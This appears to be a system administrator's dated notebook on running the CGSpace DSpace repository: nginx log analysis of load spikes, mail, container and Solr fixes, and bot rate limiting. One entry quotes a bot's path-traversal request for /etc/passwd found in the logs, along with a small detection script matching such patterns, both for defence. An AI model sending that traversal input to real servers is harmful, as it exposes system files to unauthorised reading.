+    689 35.237.175.180
+    771 108.212.105.35
+   1236 5.9.6.51
+   1554 66.249.66.219
+   4942 85.25.237.71
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     10 66.249.66.221
+     26 66.249.66.219
+     69 5.143.231.8
+    340 45.5.184.72
+   1040 34.218.226.147
+   1542 108.212.105.35
+   1937 50.116.102.77
+   4661 205.186.128.185
+   4661 70.32.83.92
+   5102 45.5.186.2
+

2019-02-07

+
    +
  • Linode sent an alert last night that the load on CGSpace (linode18) was over 300%
  • +
  • Here are the top IPs in the web server and API logs before, during, and after that time, respectively:
  • +
+
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      5 66.249.66.209
+      6 2a01:4f8:210:51ef::2
+      6 40.77.167.75
+      9 104.198.9.108
+      9 157.55.39.192
+     10 157.55.39.244
+     12 66.249.66.221
+     20 95.108.181.88
+     27 66.249.66.219
+   2381 45.5.186.2
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Feb/2019:(17|18|19|20|23)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    455 45.5.186.2
+    506 40.77.167.75
+    559 54.70.40.11
+    825 157.55.39.244
+    871 2a01:4f8:140:3192::2
+    938 157.55.39.192
+   1058 85.25.237.71
+   1416 5.9.6.51
+   1606 66.249.66.219
+   1718 35.237.175.180
+
    +
  • Then again this morning another alert:
  • +
+
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      5 66.249.66.223
+      8 104.198.9.108
+     13 110.54.160.222
+     24 66.249.66.219
+     25 175.158.217.98
+    214 34.218.226.147
+    346 45.5.184.72
+   4529 45.5.186.2
+   4661 205.186.128.185
+   4661 70.32.83.92
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "07/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    145 157.55.39.237
+    154 66.249.66.221
+    214 34.218.226.147
+    261 35.237.175.180
+    273 2a01:4f8:140:3192::2
+    300 169.48.66.92
+    487 5.143.231.39
+    766 5.9.6.51
+    771 85.25.237.71
+    848 66.249.66.219
+
    +
  • So it seems that the load issue comes from the REST API, not the XMLUI
  • +
  • I could probably rate limit the REST API, or maybe just keep increasing the alert threshold so I don’t get alert spam (this is probably the correct approach because it seems like the REST API can keep up with the requests and is returning HTTP 200 status as far as I can tell)
  • +
  • Bosede from IITA sent a message that a colleague is having problems submitting to some collections in their community:
  • +
+
Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
+
+

IITA Posters and Presentations workflow step 1 empty

+
    +
  • IITA editors or approvers should be added to that step (though I’m curious why nobody is in that group currently)
  • +
  • Abenet says we are not using the “Accept/Reject” step so this group should be deleted
  • +
  • Bizuwork asked about the “DSpace Submission Approved and Archived” emails that stopped working last month
  • +
  • I tried the test-email command on DSpace and it indeed is not working:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: aorth@mjanja.ch
+ - Subject: DSpace test email
+ - Server: smtp.serv.cgnet.com
+
+Error sending email:
+ - Error: javax.mail.MessagingException: Could not connect to SMTP host: smtp.serv.cgnet.com, port: 25;
+  nested exception is:
+        java.net.ConnectException: Connection refused (Connection refused)
+
+Please see the DSpace documentation for assistance.
+
    +
  • I can’t connect to TCP port 25 on that server so I sent a mail to CGNET support to ask what’s up
  • +
  • CGNET said these servers were discontinued in 2018-01 and that I should use Office 365
  • +
+

2019-02-08

+
    +
  • I re-configured CGSpace to use the email/password for cgspace-support, but I get this error when I try the test-email script:
  • +
+
Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR10CA0028.EURPRD10.PROD.OUTLOOK.COM]
+
    +
  • I tried to log into Outlook 365 with the credentials but I think the ones I have must be wrong, so I will ask ICT to reset the password
  • +
+

2019-02-09

+
    +
  • Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!
  • +
  • This is just for this morning:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    289 35.237.175.180
+    290 66.249.66.221
+    296 18.195.78.144
+    312 207.46.13.201
+    393 207.46.13.64
+    526 2a01:4f8:140:3192::2
+    580 151.80.203.180
+    742 5.143.231.38
+   1046 5.9.6.51
+   1331 66.249.66.219
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "09/Feb/2019:(07|08|09|10|11)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      4 66.249.83.30
+      5 49.149.10.16
+      8 207.46.13.64
+      9 207.46.13.201
+     11 105.63.86.154
+     11 66.249.66.221
+     31 66.249.66.219
+    297 2001:41d0:d:1990::
+    908 34.218.226.147
+   1947 50.116.102.77
+
    +
  • I know 66.249.66.219 is Google, 5.9.6.51 is MegaIndex, and 5.143.231.38 is SputnikBot
  • +
  • Ooh, but 151.80.203.180 is some malicious bot making requests for /etc/passwd like this:
  • +
+
/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;isAllowed=../etc/passwd
+
    +
  • 151.80.203.180 is on OVH so I sent a message to their abuse email…
  • +
+
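  • A quick way to check whether anyone else is trying the same trick is to scan the logs for traversal patterns; a rough sketch (assuming the default nginx access log location):

#!/usr/bin/env python3
# Sketch: scan nginx access logs for requests that look like path traversal
# attempts, such as the ../etc/passwd request above, and count them per IP.
import glob
import re
from collections import Counter

traversal = re.compile(r'\.\./|/etc/passwd|%2e%2e%2f', re.IGNORECASE)
offenders = Counter()

for path in glob.glob('/var/log/nginx/*.log'):
    with open(path, errors='replace') as f:
        for line in f:
            if traversal.search(line):
                offenders[line.split()[0]] += 1

for ip, count in offenders.most_common():
    print(f'{count:>5} {ip}')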

2019-02-10

+
    +
  • Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    232 18.195.78.144
+    238 35.237.175.180
+    281 66.249.66.221
+    314 151.80.203.180
+    319 34.218.226.147
+    326 40.77.167.178
+    352 157.55.39.149
+    444 2a01:4f8:140:3192::2
+   1171 5.9.6.51
+   1196 66.249.66.219
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      6 112.203.241.69
+      7 157.55.39.149
+      9 40.77.167.178
+     15 66.249.66.219
+    368 45.5.184.72
+    432 50.116.102.77
+    971 34.218.226.147
+   4403 45.5.186.2
+   4668 205.186.128.185
+   4668 70.32.83.92
+
    +
  • Another interesting thing might be the total number of requests for web and API services during that time:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
+16333
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE "10/Feb/2019:0(5|6|7|8|9)"
+15964
+
    +
  • Also, the number of unique IPs served during that time:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
+1622
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "10/Feb/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq | wc -l
+95
+
    +
  • It’s very clear to me now that the API requests are the heaviest!
  • +
  • I think I need to increase the Linode alert threshold from 300 to 350% now so I stop getting some of these alerts—it’s becoming a bit of the boy who cried wolf because it alerts like clockwork twice per day!
  • +
  • Add my Python- and shell-based metadata workflow helper scripts as well as the environment settings for pipenv to our DSpace repository (#408) so I can track changes and distribute them more formally instead of just keeping them collected on the wiki
  • +
  • Started adding IITA research theme (cg.identifier.iitatheme) to CGSpace +
      +
    • I’m still waiting for feedback from IITA whether they actually want to use “SOCIAL SCIENCE & AGRIC BUSINESS” because it is listed as “Social Science and Agribusiness” on their website
    • +
    • Also, I think they want to do some mappings of items with existing subjects to these new themes
    • +
    +
  • +
  • Update ILRI author name style in the controlled vocabulary (Domelevo Entfellner, Jean-Baka) (#409) +
      +
    • I’m still waiting to hear from Bizuwork whether we’ll batch update all existing items with the old name style
    • +
    • No, there is only one entry and Bizu already fixed it
    • +
    +
  • +
  • Last week Hector Tobon from CCAFS asked me about the Creative Commons 3.0 Intergovernmental Organizations (IGO) license because it is not in the list of SPDX licenses + +
  • +
  • Testing the mail.server.disabled property that I noticed in dspace.cfg recently +
      +
    • Setting it to true results in the following message when I try the dspace test-email helper on DSpace Test:
    • +
    +
  • +
+
Error sending email:
+ - Error: cannot test email because mail.server.disabled is set to true
+
    +
  • I’m not sure why I didn’t know about this configuration option before, and always maintained multiple configurations for development and production + +
  • +
  • I updated my local Sonatype nexus Docker image and had an issue with the volume for some reason so I decided to just start from scratch:
  • +
+
# docker rm nexus
+# docker pull sonatype/nexus3
+# mkdir -p /home/aorth/.local/lib/containers/volumes/nexus_data
+# chown 200:200 /home/aorth/.local/lib/containers/volumes/nexus_data
+# docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus-data -p 8081:8081 sonatype/nexus3
+
+
# docker pull docker.bintray.io/jfrog/artifactory-oss:latest
+# mkdir -p /home/aorth/.local/lib/containers/volumes/artifactory5_data
+# chown 1030 /home/aorth/.local/lib/containers/volumes/artifactory5_data
+# docker run --name artifactory --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+

2019-02-11

+
    +
  • Bosede from IITA said we can use “SOCIAL SCIENCE & AGRIBUSINESS” in their new IITA theme field to be consistent with other places they are using it
  • +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
+

2019-02-12

+ +
$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
+
    +
  • (DSpace 5 appears to use JPEG 92 quality so I do the same)
  • +
  • Thinking about making “top items” endpoints in my dspace-statistics-api
  • +
  • I could use the following SQL queries very easily to get the top items by views or downloads (a rough endpoint sketch follows the SQL below):
  • +
+
dspacestatistics=# SELECT * FROM items WHERE views > 0 ORDER BY views DESC LIMIT 10;
+dspacestatistics=# SELECT * FROM items WHERE downloads > 0 ORDER BY downloads DESC LIMIT 10;
+
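  • A rough sketch of what such an endpoint handler could look like (assuming the existing items table with id, views, and downloads columns and a psycopg2 connection; the real API may end up structured differently), with views versus downloads selected by a parameter:

# Sketch: a "top items" lookup for the dspace-statistics-api, for something
# like /statistics/top/items?by=views&limit=10. Table and connection details
# are assumptions based on the SQL above.
import psycopg2
import psycopg2.extras

def top_items(by='views', limit=10):
    # only allow known column names so user input is never interpolated directly
    if by not in ('views', 'downloads'):
        raise ValueError('by must be "views" or "downloads"')

    connection = psycopg2.connect('dbname=dspacestatistics user=dspacestatistics')
    with connection.cursor(cursor_factory=psycopg2.extras.DictCursor) as cursor:
        cursor.execute(
            f'SELECT id, views, downloads FROM items '
            f'WHERE {by} > 0 ORDER BY {by} DESC LIMIT %s',
            (limit,),
        )
        return [dict(row) for row in cursor.fetchall()]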
    +
  • I’d have to think about what to make the REST API endpoints, perhaps: /statistics/top/items?limit=10
  • +
  • But how do I do top items by views / downloads separately?
  • +
  • I re-deployed DSpace 6.3 locally to test the PDFBox thumbnails, especially to see if they handle CMYK files properly +
      +
    • The quality is JPEG 75 and I don’t see a way to set the thumbnail dimensions, but the resulting image is indeed sRGB:
    • +
    +
  • +
+
$ identify -verbose alc_contrastes_desafios.pdf.jpg
+...
+  Colorspace: sRGB
+
    +
  • I will read the PDFBox thumbnailer documentation to see if I can change the size and quality
  • +
+

2019-02-13

+
    +
  • ILRI ICT reset the password for the CGSpace mail account, but I still can’t get it to send mail from DSpace’s test-email utility
  • +
  • I even added extra mail properties to dspace.cfg as suggested by someone on the dspace-tech mailing list:
  • +
+
mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
+
    +
  • But the result is still:
  • +
+
Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR06CA0001.eurprd06.prod.outlook.com]
+
    +
  • I tried to log into the Outlook 365 web mail and it doesn’t work so I’ve emailed ILRI ICT again
  • +
  • After reading the common mistakes in the JavaMail FAQ I reconfigured the extra properties in DSpace’s mail configuration to be simply:
  • +
+
mail.extraproperties = mail.smtp.starttls.enable=true
+
    +
  • … and then I was able to send a mail using my personal account where I know the credentials work
  • +
  • The CGSpace account still gets this error message:
  • +
+
Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+
$ dspace user --delete --email blah@cta.int
+$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
+
    +
  • On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable webui.user.assumelogin = true
  • +
  • I will enable this on CGSpace (#411)
  • +
  • Test re-creating my local PostgreSQL and Artifactory containers with podman instead of Docker (using the volumes from my old Docker containers though):
  • +
+
# podman pull postgres:9.6-alpine
+# podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+# podman pull docker.bintray.io/jfrog/artifactory-oss
+# podman run --name artifactory -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+
    +
  • Totally works… awesome!
  • +
  • Then I tried with rootless containers by creating the subuid and subgid mappings for aorth:
  • +
+
$ sudo touch /etc/subuid /etc/subgid
+$ usermod --add-subuids 10000-75535 aorth
+$ usermod --add-subgids 10000-75535 aorth
+$ sudo sysctl kernel.unprivileged_userns_clone=1
+$ podman pull postgres:9.6-alpine
+$ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+
    +
  • Which totally works, but Podman’s rootless support doesn’t work with port mappings yet…
  • +
  • Deploy the Tomcat-7-from-tarball branch on CGSpace (linode18), but first stop the Ubuntu Tomcat 7 and do some basic prep before running the Ansible playbook:
  • +
+
# systemctl stop tomcat7
+# apt remove tomcat7 tomcat7-admin
+# useradd -m -r -s /bin/bash dspace
+# mv /usr/share/tomcat7/.m2 /home/dspace
+# mv /usr/share/tomcat7/src /home/dspace
+# chown -R dspace:dspace /home/dspace
+# chown -R dspace:dspace /home/cgspace.cgiar.org
+# dpkg -P tomcat7-admin tomcat7-common
+
    +
  • After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:
  • +
+
2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+
    +
  • The issue last month was address space, which is now set as LimitAS=infinity in tomcat7.service
  • +
  • I re-ran the Ansible playbook to make sure all configs etc were in place, then rebooted the server
  • +
  • Still the error persists after reboot
  • +
  • I will try to stop Tomcat and then remove the locks manually:
  • +
+
# find /home/cgspace.cgiar.org/solr/ -iname "write.lock" -delete
+
    +
  • After restarting Tomcat the usage statistics are back
  • +
  • Interestingly, many of the locks were from last month, last year, and even 2015! I’m pretty sure that’s not supposed to be how locks work…
  • +
  • Help Sarah Kasyoka finish an item submission that she was having issues with due to the file size
  • +
  • I increased the nginx upload limit, but she said she was having problems and couldn’t really tell me why
  • +
  • I logged in as her and completed the submission with no problems…
  • +
+

2019-02-15

+
    +
  • Tomcat was killed around 3AM by the kernel’s OOM killer according to dmesg:
  • +
+
[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
+[Fri Feb 15 03:10:42 2019] Killed process 12027 (java) total-vm:14108048kB, anon-rss:5450284kB, file-rss:0kB, shmem-rss:0kB
+[Fri Feb 15 03:10:43 2019] oom_reaper: reaped process 12027 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • The tomcat7 service shows:
  • +
+
Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
+
    +
  • I suspect it was related to the media-filter cron job that runs at 3AM but I don’t see anything particular in the log files
  • +
  • I want to try to normalize the text_lang values to make working with metadata easier
  • +
  • We currently have a bunch of weird values that DSpace uses like NULL, en_US, and en and others that have been entered manually by editors:
  • +
+
dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count
+-----------+---------
+           | 1069539
+ en_US     |  577110
+           |  334768
+ en        |  133501
+ es        |      12
+ *         |      11
+ es_ES     |       2
+ fr        |       2
+ spa       |       2
+ E.        |       1
+ ethnob    |       1
+
    +
  • The majority are NULL, en_US, the blank string, and en—the rest are not enough to be significant
  • +
  • Theoretically this field could help if you wanted to search for Spanish-language fields in the API or something, but even for the English fields there are two different values (and those are from DSpace itself)!
  • +
  • I’m going to normalize these to NULL at least on DSpace Test for now:
  • +
+
dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
+UPDATE 1045410
+
    +
  • I started proofing IITA’s 2019-01 records that Sisay uploaded this week +
      +
    • There were 259 records in IITA’s original spreadsheet, but there are 276 in Sisay’s collection
    • +
    • Also, I found that there are at least twenty duplicates in these records that we will need to address
    • +
    +
  • +
  • ILRI ICT fixed the password for the CGSpace support email account and I tested it on Outlook 365 web and DSpace and it works
  • +
  • Re-create my local PostgreSQL container for the new PostgreSQL version and to use podman’s volumes:
  • +
+
$ podman pull postgres:9.6-alpine
+$ podman volume create dspacedb_data
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
+
    +
  • And it’s all running without root!
  • +
  • Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:
  • +
+
$ podman volume create artifactory_data
+artifactory_data
+$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+$ buildah unshare
+$ chown -R 1030:1030 ~/.local/share/containers/storage/volumes/artifactory_data
+$ exit
+$ podman start artifactory
+
+

2019-02-17

+
    +
  • I ran DSpace’s cleanup task on CGSpace (linode18) and there were errors:
  • +
+
$ dspace cleanup -v
+Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(162844) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
+UPDATE 1
+
    +
  • I merged the Atmire Metadata Quality Module (MQM) changes to the 5_x-prod branch and deployed it on CGSpace (#407)
  • +
  • Then I ran all system updates on CGSpace server and rebooted it
  • +
+

2019-02-18

+
    +
  • Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):
  • +
  • There seems to have been a lot of activity in XMLUI:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+   1236 18.212.208.240
+   1276 54.164.83.99
+   1277 3.83.14.11
+   1282 3.80.196.188
+   1296 3.84.172.18
+   1299 100.24.48.177
+   1299 34.230.15.139
+   1327 52.54.252.47
+   1477 5.9.6.51
+   1861 94.71.244.172
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      8 42.112.238.64
+      9 121.52.152.3
+      9 157.55.39.50
+     10 110.54.151.102
+     10 194.246.119.6
+     10 66.249.66.221
+     15 190.56.193.94
+     28 66.249.66.219
+     43 34.209.213.122
+    178 50.116.102.77
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
+2727
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq | wc -l
+186
+
    +
  • 94.71.244.172 is in Greece and uses the user agent “Indy Library”
  • +
  • At least they are re-using their Tomcat session:
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
+
  • The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent “Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0”:
    • 52.54.252.47
    • 34.230.15.139
    • 100.24.48.177
    • 3.84.172.18
    • 3.80.196.188
    • 3.83.14.11
    • 54.164.83.99
    • 18.212.208.240
  • Actually, even up to the top 30 IPs are almost all on Amazon and use the same user agent!
  • For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "18/Feb/2019:1(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
+   1173 52.91.249.23
+   1176 107.22.118.106
+   1178 3.88.173.152
+   1179 3.81.136.184
+   1183 34.201.220.164
+   1183 3.89.134.93
+   1184 54.162.66.53
+   1187 3.84.62.209
+   1188 3.87.4.140
+   1189 54.158.27.198
+   1190 54.209.39.13
+   1192 54.82.238.223
+   1208 3.82.232.144
+   1209 3.80.128.247
+   1214 54.167.64.164
+   1219 3.91.17.126
+   1220 34.201.108.226
+   1221 3.84.223.134
+   1222 18.206.155.14
+   1231 54.210.125.13
+   1236 18.212.208.240
+   1276 54.164.83.99
+   1277 3.83.14.11
+   1282 3.80.196.188
+   1296 3.84.172.18
+   1299 100.24.48.177
+   1299 34.230.15.139
+   1327 52.54.252.47
+   1477 5.9.6.51
+   1861 94.71.244.172
+
    +
  • In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):
  • +
+
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
+     10 18/Feb/2019:17:20
+     10 18/Feb/2019:17:22
+     10 18/Feb/2019:17:31
+     11 18/Feb/2019:13:21
+     11 18/Feb/2019:15:18
+     11 18/Feb/2019:16:43
+     11 18/Feb/2019:16:57
+     11 18/Feb/2019:16:58
+     11 18/Feb/2019:18:34
+     12 18/Feb/2019:14:37
+
    +
  • As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics
  • +
  • There were 92,000 requests from these IPs alone today!
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
+92756
+
    +
  • I will add this user agent to the “badbots” rate limiting in our nginx configuration
  • +
  • I realized that I had effectively only been applying the “badbots” rate limiting to requests at the root, so I added it to the other blocks that match Discovery, Browse, etc as well
  • +
  • IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary
  • +
  • I will merge them with our existing list and then resolve their names using my resolve-orcids.py script:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt  | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2019-02-18-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
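  • For reference, resolving an ORCID iD to a display name boils down to one request against ORCID’s public API; a minimal sketch (not the actual resolve-orcids.py script, and assuming the v3.0 public endpoint):

#!/usr/bin/env python3
# Sketch: look up the display name for each ORCID identifier in a text file
# using ORCID's public API. Not the real resolve-orcids.py script.
import sys
import requests

def resolve(orcid):
    res = requests.get(f'https://pub.orcid.org/v3.0/{orcid}/person',
                       headers={'Accept': 'application/json'})
    res.raise_for_status()
    name = res.json().get('name') or {}
    given = (name.get('given-names') or {}).get('value', '')
    family = (name.get('family-name') or {}).get('value', '')
    return f'{given} {family}'.strip()

if __name__ == '__main__':
    with open(sys.argv[1]) as f:
        for line in f:
            orcid = line.strip()
            if orcid:
                print(f'{resolve(orcid)}: {orcid}')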
    +
  • I merged the changes to the 5_x-prod branch and they will go live the next time we re-deploy CGSpace (#412)
  • +
+

2019-02-19

+
    +
  • Linode sent another alert about CPU usage on CGSpace (linode18) averaging 417% this morning
  • +
  • Unfortunately, I don’t see any strange activity in the web server API or XMLUI logs at that time in particular
  • +
  • So far today the top ten IPs in the XMLUI logs are:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+  11541 18.212.208.240
+  11560 3.81.136.184
+  11562 3.88.237.84
+  11569 34.230.15.139
+  11572 3.80.128.247
+  11573 3.91.17.126
+  11586 54.82.89.217
+  11610 54.209.39.13
+  11657 54.175.90.13
+  14686 143.233.242.130
+
    +
  • 143.233.242.130 is in Greece and using the user agent “Indy Library”, like the top IP yesterday (94.71.244.172)
  • +
  • That user agent is in our Tomcat list of crawlers so at least its resource usage is controlled by forcing it to use a single Tomcat session, but I don’t know if DSpace recognizes if this is a bot or not, so the logs are probably skewed because of this
  • +
  • The user is requesting only things like /handle/10568/56199?show=full so it’s nothing malicious, only annoying
  • +
  • Otherwise there are still shitloads of IPs from Amazon hammering the server, though I see HTTP 503 errors now after yesterday’s nginx rate limiting updates +
      +
    • I should really try to script something around ipapi.co to get these quickly and easily
    • +
    +
  • +
  • The top requests in the API logs today are:
  • +
+
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "19/Feb/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     42 66.249.66.221
+     44 156.156.81.215
+     55 3.85.54.129
+     76 66.249.66.219
+     87 34.209.213.122
+   1550 34.218.226.147
+   2127 50.116.102.77
+   4684 205.186.128.185
+  11429 45.5.186.2
+  12360 2a01:7e00::f03c:91ff:fe0a:d645
+
    +
  • 2a01:7e00::f03c:91ff:fe0a:d645 is on Linode, and I can see from the XMLUI access logs that it is Drupal, so I assume it is part of the new ILRI website harvester…
  • +
  • Jesus, Linode just sent another alert as we speak that the load on CGSpace (linode18) has been at 450% the last two hours! I’m so fucking sick of this
  • +
  • Our usage stats have exploded the last few months:
  • +
+

Usage stats

+
    +
  • I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate
  • +
  • I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from 10568/96140 almost 200 times:
  • +
+
